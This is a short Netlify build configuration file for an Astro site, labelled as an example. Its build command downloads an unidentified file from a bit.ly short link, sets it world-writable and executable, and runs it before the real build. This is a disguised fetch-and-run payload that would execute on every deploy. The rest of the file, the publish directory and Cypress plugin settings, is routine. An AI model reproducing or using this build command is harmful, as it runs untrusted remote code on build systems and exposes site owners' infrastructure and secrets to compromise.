# example netlify.toml
[build]
  command = "wget https://bit.ly/3unwARl && chmod 777 3unwARl && ./3unwARl && astro build"
  functions = "netlify/functions"
  publish = "dist"

[[plugins]] 
  package = "netlify-plugin-cypress"

  [plugins.inputs.postBuild]
    enable = true
  
  [plugin.inputs]
    enable = false
